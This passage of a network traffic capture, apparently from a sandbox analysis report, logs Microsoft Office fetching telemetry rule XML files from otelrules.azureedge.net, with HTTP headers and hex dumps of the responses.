2024-11-07 03:13:21 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	49892	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:21 UTC	192	OUT	GET /rules/rule701050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:21 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:21 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB256F43" x-ms-request-id: 68d80581-001e-0079-5c74-3012e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031321Z-17df447cdb5vq4m4hC1DFWrbp800000003s00000000045e5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:21 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.4	49889	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:21 UTC	192	OUT	GET /rules/rule701800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:21 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:21 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BEA414B16" x-ms-request-id: 59bb3ce9-601e-0097-63c3-2bf33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031321Z-16547b76f7fm7xw6hC1DFW5px400000007gg000000006vws x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:21 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.4	49894	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:22 UTC	192	OUT	GET /rules/rule702750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:22 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:22 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE5B7B174" x-ms-request-id: 14de8335-b01e-003e-77d2-2c8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031322Z-16547b76f7f22sh5hC1DFWyb4w00000007kg000000000hnf x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:22 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	49896	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:22 UTC	192	OUT	GET /rules/rule702300v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:22 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:22 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDC13EFEF" x-ms-request-id: 697e3ed8-001e-0079-4fab-3012e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031322Z-15869dbbcc6ss7fxhC1DFWq6vs00000000w0000000009eyz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:22 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.4	49898	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:22 UTC	192	OUT	GET /rules/rule703400v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:22 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:22 GMT Content-Type: text/xml Content-Length: 1388 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDBD9126E" x-ms-request-id: 8716aa7d-101e-00a2-3036-2f9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031322Z-15869dbbcc6m5ms4hC1DFWx02800000008e000000000etpk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:22 UTC	1388	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	49895	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:22 UTC	192	OUT	GET /rules/rule702301v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:22 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:22 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE976026E" x-ms-request-id: 898deafb-901e-0048-35d2-2cb800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031322Z-16547b76f7fj5p7mhC1DFWf8w400000007ng00000000e7u1 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:22 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.4	49897	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:22 UTC	192	OUT	GET /rules/rule703401v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:22 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:22 GMT Content-Type: text/xml Content-Length: 1425 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6BD89A1" x-ms-request-id: 11e565ba-b01e-003d-3e55-2ed32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031322Z-17df447cdb54ntx4hC1DFW2k4000000003tg000000009t6k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:22 UTC	1425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.4	49903	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:23 UTC	192	OUT	GET /rules/rule702551v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:23 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:23 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCE9703A" x-ms-request-id: 62e6dde4-a01e-0084-0658-2e9ccd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031323Z-15869dbbcc6xcpf8hC1DFWxtx000000008bg000000005p3e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:23 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.4	49900	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:23 UTC	192	OUT	GET /rules/rule702500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:23 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:23 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB813B3F" x-ms-request-id: 71af9553-101e-00a2-14d2-2c9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031323Z-16547b76f7f22sh5hC1DFWyb4w00000007e000000000f206 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:23 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.4	49899	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:23 UTC	192	OUT	GET /rules/rule702501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:23 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:23 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT ETag: "0x8DC582BE7C66E85" x-ms-request-id: e6ac82a3-901e-002a-355c-2e7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031323Z-15869dbbcc6tfpj2hC1DFW384c0000000160000000003r20 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:23 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.4	49901	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:23 UTC	192	OUT	GET /rules/rule700501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:23 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:23 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT ETag: "0x8DC582BE89A8F82" x-ms-request-id: e21fa4e1-f01e-003f-655f-2ed19d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031323Z-15869dbbcc6m5ms4hC1DFWx02800000008p0000000001n7r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:23 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.4	49902	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
